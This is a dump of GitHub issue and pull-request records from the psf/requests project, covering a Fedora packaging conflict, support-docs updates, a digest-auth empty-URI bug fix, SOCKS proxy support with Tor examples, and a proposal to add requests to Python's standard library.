url: stringlengths [50, 53]
repository_url: stringclasses (1 value)
labels_url: stringlengths [64, 67]
comments_url: stringlengths [59, 62]
events_url: stringlengths [57, 60]
html_url: stringlengths [38, 43]
id: int64 [597k, 2.65B]
node_id: stringlengths [18, 32]
number: int64 [1, 6.83k]
title: stringlengths [1, 296]
user: dict
labels: listlengths [0, 5]
state: stringclasses (2 values)
locked: bool (2 classes)
assignee: dict
assignees: listlengths [0, 4]
milestone: dict
comments: int64 [0, 211]
created_at: stringlengths [20, 20]
updated_at: stringlengths [20, 20]
closed_at: stringlengths [20, 20]
author_association: stringclasses (3 values)
active_lock_reason: stringclasses (4 values)
body: stringlengths [0, 65.6k]
closed_by: dict
reactions: dict
timeline_url: stringlengths [59, 62]
performed_via_github_app: null
state_reason: stringclasses (3 values)
draft: bool (2 classes)
pull_request: dict
is_pull_request: bool (2 classes)
issue_comments: listlengths [0, 30]
https://api.github.com/repos/psf/requests/issues/2430
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2430/labels{/name}
https://api.github.com/repos/psf/requests/issues/2430/comments
https://api.github.com/repos/psf/requests/issues/2430/events
https://github.com/psf/requests/issues/2430
55,872,428
MDU6SXNzdWU1NTg3MjQyOA==
2,430
Upgrade/install of 2.5.0 fails on Fedora via yum
{ "avatar_url": "https://avatars.githubusercontent.com/u/10137?v=4", "events_url": "https://api.github.com/users/ghost/events{/privacy}", "followers_url": "https://api.github.com/users/ghost/followers", "following_url": "https://api.github.com/users/ghost/following{/other_user}", "gists_url": "https://api.github.com/users/ghost/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ghost", "id": 10137, "login": "ghost", "node_id": "MDQ6VXNlcjEwMTM3", "organizations_url": "https://api.github.com/users/ghost/orgs", "received_events_url": "https://api.github.com/users/ghost/received_events", "repos_url": "https://api.github.com/users/ghost/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ghost/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ghost/subscriptions", "type": "User", "url": "https://api.github.com/users/ghost", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-29T08:51:22Z
2021-09-08T20:00:50Z
2015-01-29T10:34:10Z
NONE
resolved
Running transaction check Running transaction test Transaction test succeeded Running transaction (shutdown inhibited) Updating : python-requests-2.5.0-3.fc21.noarch 1/2 Error unpacking rpm package python-requests-2.5.0-3.fc21.noarch _error: unpacking of archive failed on file /usr/lib/python2.7/site-packages/requests/packages/urllib3: cpio: rename_ Verifying : python-requests-2.5.0-3.fc21.noarch 1/2 python-requests-2.3.0-3.fc21.noarch was supposed to be removed but is not! Verifying : python-requests-2.3.0-3.fc21.noarch 2/2 Failed: python-requests.noarch 0:2.3.0-3.fc21 python-requests.noarch 0:2.5.0-3.fc21
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2430/reactions" }
https://api.github.com/repos/psf/requests/issues/2430/timeline
null
completed
null
null
false
[ "v 2.3 can be installed/uninstalled\nv2.5 can't be installed/upgraded-to\nWorks fine from pip\n", "We do not package or build the Red Hat packages. Please take this up with downstream.\n", "This seems to be caused by a conflict when the package is already installed via pip.\nSee https://bugzilla.redhat.com/show_bug.cgi?id=1177479#c4\n\nOne solution is to \"pip uninstall requests\". Or upgrade via pip instead of installing via rpm.\n" ]
https://api.github.com/repos/psf/requests/issues/2429
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2429/labels{/name}
https://api.github.com/repos/psf/requests/issues/2429/comments
https://api.github.com/repos/psf/requests/issues/2429/events
https://github.com/psf/requests/pull/2429
55,760,918
MDExOlB1bGxSZXF1ZXN0MjgxOTYyNTE=
2,429
Update support documentation to be more accurate
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "fad8c7", "default": false, "description": null, "id": 136616769, "name": "Documentation", "node_id": "MDU6TGFiZWwxMzY2MTY3Njk=", "url": "https://api.github.com/repos/psf/requests/labels/Documentation" } ]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" } ]
null
12
2015-01-28T14:16:25Z
2021-09-08T08:01:05Z
2015-03-04T22:20:33Z
CONTRIBUTOR
resolved
We were missing instructions to report security vulnerabilities, and all of the documentation referred to Kenneth as the only source of support. We were also missing a link to StackOverflow.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2429/reactions" }
https://api.github.com/repos/psf/requests/issues/2429/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2429.diff", "html_url": "https://github.com/psf/requests/pull/2429", "merged_at": "2015-03-04T22:20:33Z", "patch_url": "https://github.com/psf/requests/pull/2429.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2429" }
true
[ "One note. =D\n", "Added you @Lukasa and added a bit more detail about vulnerability reporting.\n", "This looks good.\n- I might duplicate the vulnerability reporting text in a top-level page called \"Security\". Basically you want to make it really easy for anyone googling \"python requests security\" to find the page and if it's under a page heading called Support it's easier for Google/users to miss it\n- I might break up the text into multiple paragraphs, as [people don't read on the Internet](http://www.nngroup.com/articles/how-users-read-on-the-web/), but they tend to fixate on the left edge of text (eg the beginnings of paragraphs). \n", "> I might duplicate the vulnerability reporting text in a top-level page called \"Security\". Basically you want to make it really easy for anyone googling \"python requests security\" to find the page and if it's under a page heading called Support it's easier for Google/users to miss it\n\n\"Security\" is going to cause more search problems than not. I have a feeling people will be searching for that in relation to verifying/securing connections. I'm not adverse to this being a separate page (in fact I'd prefer it) but this will do for now.\n\n> I might break up the text into multiple paragraphs, as people don't read on the Internet, but they tend to fixate on the left edge of text (eg the beginnings of paragraphs). \n\nDone\n", "@Lukasa ping ;)\n", "@sigmavirus24 Is it worth adding GPG key fingerprints for you and I?\n", "Let me find mine, can you add yours as a comment?\n", "Actually, I'll push mine, you can update yours since this is a branch on requests proper that we can both push to.\n", "My key is there now. =)\n", "Good to merge?\n", ":+1:\n", ":cake: :sparkles: :cake: \n" ]
https://api.github.com/repos/psf/requests/issues/2428
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2428/labels{/name}
https://api.github.com/repos/psf/requests/issues/2428/comments
https://api.github.com/repos/psf/requests/issues/2428/events
https://github.com/psf/requests/pull/2428
55,613,958
MDExOlB1bGxSZXF1ZXN0MjgxMDU4OTM=
2,428
Docs fixed
{ "avatar_url": "https://avatars.githubusercontent.com/u/1381173?v=4", "events_url": "https://api.github.com/users/sepulchered/events{/privacy}", "followers_url": "https://api.github.com/users/sepulchered/followers", "following_url": "https://api.github.com/users/sepulchered/following{/other_user}", "gists_url": "https://api.github.com/users/sepulchered/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sepulchered", "id": 1381173, "login": "sepulchered", "node_id": "MDQ6VXNlcjEzODExNzM=", "organizations_url": "https://api.github.com/users/sepulchered/orgs", "received_events_url": "https://api.github.com/users/sepulchered/received_events", "repos_url": "https://api.github.com/users/sepulchered/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sepulchered/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sepulchered/subscriptions", "type": "User", "url": "https://api.github.com/users/sepulchered", "user_view_type": "public" }
[]
closed
true
null
[]
null
6
2015-01-27T12:53:10Z
2021-09-08T09:01:00Z
2015-01-27T18:22:35Z
NONE
resolved
Moved "Custom Headers" part after "More complicated POST requests" and before "POST a Multipart-Encoded File" in the quickstart doc, since adding headers is mentioned in the last one.
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2428/reactions" }
https://api.github.com/repos/psf/requests/issues/2428/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2428.diff", "html_url": "https://github.com/psf/requests/pull/2428", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2428.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2428" }
true
[ "I think the correct fix is actually to come up with an example that doesn't require the `data` parameter. Custom headers should come before anything with 'more complicated' in the title. =)\n", "I see, I just decided that it would be enough because custom headers are not mentioned in \"More complicated POST requests\".\n", "Yeah, I can see that, but I think headers are the simpler topic. If you feel strongly about it though I can merge as-is and consider changing it later. =)\n", "Moved it back and set example to use only headers kwarg without data. :)\n", "Sorry for not being careful, now it finally seems like I fixed everything that was needed.\n", "I think i prefer the existing form of this. Thank you, though!\n" ]
https://api.github.com/repos/psf/requests/issues/2427
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2427/labels{/name}
https://api.github.com/repos/psf/requests/issues/2427/comments
https://api.github.com/repos/psf/requests/issues/2427/events
https://github.com/psf/requests/pull/2427
55,436,588
MDExOlB1bGxSZXF1ZXN0MjgwMDA4MDA=
2,427
Bug fix: field uri in digest authentication should not be empty when enc...
{ "avatar_url": "https://avatars.githubusercontent.com/u/1176856?v=4", "events_url": "https://api.github.com/users/luozhaoyu/events{/privacy}", "followers_url": "https://api.github.com/users/luozhaoyu/followers", "following_url": "https://api.github.com/users/luozhaoyu/following{/other_user}", "gists_url": "https://api.github.com/users/luozhaoyu/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/luozhaoyu", "id": 1176856, "login": "luozhaoyu", "node_id": "MDQ6VXNlcjExNzY4NTY=", "organizations_url": "https://api.github.com/users/luozhaoyu/orgs", "received_events_url": "https://api.github.com/users/luozhaoyu/received_events", "repos_url": "https://api.github.com/users/luozhaoyu/repos", "site_admin": false, "starred_url": "https://api.github.com/users/luozhaoyu/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/luozhaoyu/subscriptions", "type": "User", "url": "https://api.github.com/users/luozhaoyu", "user_view_type": "public" }
[]
closed
true
null
[]
null
6
2015-01-26T00:13:59Z
2021-09-08T08:00:53Z
2015-04-06T15:19:15Z
CONTRIBUTOR
resolved
...ounter http redirections. https://github.com/kennethreitz/requests/issues/2426
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2427/reactions" }
https://api.github.com/repos/psf/requests/issues/2427/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2427.diff", "html_url": "https://github.com/psf/requests/pull/2427", "merged_at": "2015-04-06T15:19:15Z", "patch_url": "https://github.com/psf/requests/pull/2427.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2427" }
true
[ "I haven't read this yet, and I'm certain it really is this simple, but I want to re read the RFC about this regardless to make sure this applies to all cases. I suppose we've never had trouble with this because people were using URIs that had paths when authenticating. It doesn't hurt to be safe though. =)\n\nThanks for your patience @luozhaoyu \n", "@sigmavirus24 Sure! It is rare because I could only reproduce it when use a proxy and encounter a redirect...\n", "I'm comfortable with this. Sorry for the delay @luozhaoyu. I lost track of this.\n\nThoughts @Lukasa?\n", "Fine by me. =)\n", "Thanks @luozhaoyu \n", "@sigmavirus24 You're welcome!\n" ]
https://api.github.com/repos/psf/requests/issues/2426
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2426/labels{/name}
https://api.github.com/repos/psf/requests/issues/2426/comments
https://api.github.com/repos/psf/requests/issues/2426/events
https://github.com/psf/requests/issues/2426
55,436,121
MDU6SXNzdWU1NTQzNjEyMQ==
2,426
Bug: field "uri" in header["Proxy-Authorization"] should not be empty
{ "avatar_url": "https://avatars.githubusercontent.com/u/1176856?v=4", "events_url": "https://api.github.com/users/luozhaoyu/events{/privacy}", "followers_url": "https://api.github.com/users/luozhaoyu/followers", "following_url": "https://api.github.com/users/luozhaoyu/following{/other_user}", "gists_url": "https://api.github.com/users/luozhaoyu/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/luozhaoyu", "id": 1176856, "login": "luozhaoyu", "node_id": "MDQ6VXNlcjExNzY4NTY=", "organizations_url": "https://api.github.com/users/luozhaoyu/orgs", "received_events_url": "https://api.github.com/users/luozhaoyu/received_events", "repos_url": "https://api.github.com/users/luozhaoyu/repos", "site_admin": false, "starred_url": "https://api.github.com/users/luozhaoyu/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/luozhaoyu/subscriptions", "type": "User", "url": "https://api.github.com/users/luozhaoyu", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2015-01-25T23:58:04Z
2021-09-08T23:05:48Z
2015-04-06T15:19:29Z
CONTRIBUTOR
resolved
#### Issue When I am handling [toolbelt's digest proxy issue](https://github.com/sigmavirus24/requests-toolbelt/issues/53), I find the proxy server rejects my request header: Connection: keep-alive\r\n Proxy-Authorization: Digest username="luozhaoyu", realm="[email protected]", nonce="o3jFVAAAAADwDnHL3X8AABqmXw4AAAAA", uri="", response="9a5d356b4a5bac5473864896bcfdcc69", qop="auth", nc=00000001, cnonce="a681e67b2a3bb034"\r\n Accept-Encoding: gzip, deflate\r\n The problem is because field uri should be "/" rather than "". ([request-uri's definition is in RFC 2616](http://tools.ietf.org/html/rfc2616#section-5.1.2)) #### Bug reproduce It is funny to find the bug. Set up a digest auth proxy, `r = requests.get(url, proxies=proxies, auth=auth, allow_redirects=True)` url is http://bing.cn/ (this is a typo), there will be a HTTP 301 to http://www.rz.com/, client would try to access http://www.rz.com directly, but the proxy would reject and ask for user/password. However, the automatic redirect's url parse result will be `ParseResult(scheme='http', netloc='www.rz.com', path='', params='', query='', fragment='')` The path is empty, and will result in authentication failure. #### Solution is one line: add a line in `auth.py` line 110: `path = "/" if not path else path` I will create a pull request later.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2426/reactions" }
https://api.github.com/repos/psf/requests/issues/2426/timeline
null
completed
null
null
false
[ "Closed by #2427.\n" ]
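The empty-path behaviour described in issue #2426 above can be reproduced in a few lines. This is a minimal sketch of the proposed one-line fix, not the actual code in requests' `auth.py`; `digest_uri` is a hypothetical helper name introduced here for illustration.

```python
from urllib.parse import urlparse


def digest_uri(url):
    """Build the request-uri for a Digest auth header.

    Sketch of the fix proposed in the issue: an empty path (as
    urlparse produces for a bare host like 'http://www.rz.com')
    is normalised to '/', per RFC 2616's request-uri definition,
    so the header never contains uri="".
    """
    parsed = urlparse(url)
    path = parsed.path or "/"  # the proposed fix: never emit an empty uri
    if parsed.query:
        path = path + "?" + parsed.query
    return path


print(urlparse("http://www.rz.com").path)  # → '' (the buggy value)
print(digest_uri("http://www.rz.com"))     # → '/'
```

A redirect to a bare host URL is exactly the case the reporter hit: the redirect target parses with an empty path, and the proxy rejects the resulting `uri=""` in the Proxy-Authorization header.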
https://api.github.com/repos/psf/requests/issues/2425
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2425/labels{/name}
https://api.github.com/repos/psf/requests/issues/2425/comments
https://api.github.com/repos/psf/requests/issues/2425/events
https://github.com/psf/requests/issues/2425
55,425,272
MDU6SXNzdWU1NTQyNTI3Mg==
2,425
SOCKS proxy support
{ "avatar_url": "https://avatars.githubusercontent.com/u/6208662?v=4", "events_url": "https://api.github.com/users/jorenham/events{/privacy}", "followers_url": "https://api.github.com/users/jorenham/followers", "following_url": "https://api.github.com/users/jorenham/following{/other_user}", "gists_url": "https://api.github.com/users/jorenham/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/jorenham", "id": 6208662, "login": "jorenham", "node_id": "MDQ6VXNlcjYyMDg2NjI=", "organizations_url": "https://api.github.com/users/jorenham/orgs", "received_events_url": "https://api.github.com/users/jorenham/received_events", "repos_url": "https://api.github.com/users/jorenham/repos", "site_admin": false, "starred_url": "https://api.github.com/users/jorenham/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/jorenham/subscriptions", "type": "User", "url": "https://api.github.com/users/jorenham", "user_view_type": "public" }
[]
closed
true
null
[]
null
8
2015-01-25T19:01:05Z
2021-09-05T00:06:58Z
2015-01-25T19:14:56Z
NONE
resolved
I would like to request support for Socket Secure protocol. There exists a fork (https://github.com/dvska/requesocks) with this capability, but it is limited (python 2 only). Currently the `AssertionError: Not supported proxy scheme socks5` is thrown when attempting to connect to a socks5 proxy. A quick Google search (https://www.google.nl/search?q=socks+proxy+list) illustrates the popularity of the protocol. Even Tor and I2P use it.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2425/reactions" }
https://api.github.com/repos/psf/requests/issues/2425/timeline
null
completed
null
null
false
[ "https://github.com/kennethreitz/requests/issues?q=is%3Aissue+socks+is%3Aclosed would have been a good search before opening this issue as well.\n", "https://github.com/kennethreitz/requests/pull/478 was the only effort anyone made towards including this support in requests over 2 years ago. As of now, https://github.com/shazow/urllib3/pull/486 is still in progress. Until that is finished there is nothing we can do about supporting socks proxies. \n", "If I do \n\n``` python\n#proxy\n # SOCKS5 proxy for HTTP/HTTPS\n proxies = {\n 'http' : \"socks5://myproxy:9191\",\n 'https' : \"socks5://myproxy:9191\"\n }\n\n #headers\n headers = {\n\n }\n\n url='http://icanhazip.com/'\n res = requests.get(url, headers=headers, proxies=proxies)\n```\n\nI get `AssertionError: Not supported proxy scheme socks5`\n", "@loretoparisi make sure you have the latest version of `requests` and also install `PySocks`. here is an example of using Tor (via a socks5 proxy) with requests: https://github.com/AlJohri/python-tor-examples\n", "How can i open .onion domains with this code?\r\nNow i getting error:\r\n\r\n```\r\nrequests.exceptions.ConnectionError: HTTPConnectionPool(host='zqktlwi4fecvo6ri.onion', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7fd35ba09b10>: Failed to establish a new connection: [Errno -2] Name or service not known',))\r\n```", "You need to use the `socks5h` scheme ([stackoverflow](https://stackoverflow.com/questions/42971622/fetching-a-onion-domain-with-requests)):\r\n\r\nhttps://github.com/requests/requests/blob/e3f89bf23c53b98593e4248054661472aacac820/requests/packages/urllib3/contrib/socks.py#L155-L160\r\n\r\nExample:\r\n\r\n```python\r\nimport requests\r\n\r\nproxies = {\r\n 'http': 'socks5h://127.0.0.1:9050',\r\n 'https': 'socks5h://127.0.0.1:9050'\r\n}\r\n\r\nresponse = requests.get('http://nzxj65x32vh2fkhk.onion/all', proxies=proxies)\r\nprint(response.text)\r\n\r\nresponse = requests.get('http://zqktlwi4fecvo6ri.onion/', proxies=proxies)\r\nprint(response.text)\r\n```\r\n\r\nYou'll notice that the first `.onion` link works while the second (your link) 403s. This is the most probable explanation:\r\n- https://www.reddit.com/r/TOR/comments/t04z2/tor_and_403_errors/\r\n- https://tor.stackexchange.com/questions/4923/tor-and-error-403-forbidden", "Wow, it's work, but on URL http://zqktlwi4fecvo6ri.onion (Hidden Wiki) i'm getting 403.\r\nThanks, next i'll try to understanding by myself", "> @loretoparisi make sure you have the latest version of `requests` and also install `PySocks`. here is an example of using Tor (via a socks5 proxy) with requests: https://github.com/AlJohri/python-tor-examples\r\n\r\nThanks ! Pysocks is what I didn't install, but there is another annoying exception, could you help me?\r\n```\r\nSOCKSHTTPSConnectionPool(host='www.pinterest.com', port=443): \r\nMax retries exceeded with url: /search/pins/q=poster%20food&rs=typed&term_meta[]=poster%7Ctyped&term_meta[]=food%7Ctyped\r\n(Caused by SSLError(SSLError(\"bad handshake: SysCallError(-1, 'Unexpected EOF')\",),))\r\n```" ]
https://api.github.com/repos/psf/requests/issues/2424
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2424/labels{/name}
https://api.github.com/repos/psf/requests/issues/2424/comments
https://api.github.com/repos/psf/requests/issues/2424/events
https://github.com/psf/requests/issues/2424
55,422,175
MDU6SXNzdWU1NTQyMjE3NQ==
2,424
Consider Requests' Inclusion in Python 3.5's Standard Library
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
[ { "color": "f7c6c7", "default": false, "description": null, "id": 167537670, "name": "Propose Close", "node_id": "MDU6TGFiZWwxNjc1Mzc2NzA=", "url": "https://api.github.com/repos/psf/requests/labels/Propose%20Close" } ]
closed
true
null
[]
null
42
2015-01-25T17:17:59Z
2021-09-08T22:00:48Z
2015-05-03T15:08:10Z
CONTRIBUTOR
resolved
There's a lot to this, but I'll keep it simple... Would the Python community, as a whole, benefit from Requests being added into the standard library? Would love to hear your thoughts and opinions on the subject!
